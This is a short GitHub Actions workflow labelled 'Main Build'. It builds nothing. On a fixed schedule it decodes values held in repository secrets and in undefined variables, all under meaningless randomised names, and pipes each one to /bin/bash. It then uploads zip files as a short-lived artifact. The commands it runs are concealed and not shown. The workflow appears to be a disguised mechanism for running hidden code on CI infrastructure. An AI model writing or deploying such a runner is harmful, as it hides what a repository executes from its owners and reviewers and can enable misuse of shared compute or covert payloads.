name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '17 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          ljzco2: ${{ secrets.ljzco2 }}
        run: |
          printf '%s' "$ljzco2" | jq -r .rxxq51 | /bin/bash
          echo $hfrsw03 | jq -r .m858 | /bin/bash
          printf '%s' "$fsa3" | jq -r .vu60 | /bin/bash
          echo $s6520 | jq -r .rd5210 | /bin/bash
          printf '%s' "$vqamb44345" | jq -r .xfqgg6611 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: hM0htOsa
          path: "*.zip"
          retention-days: 1
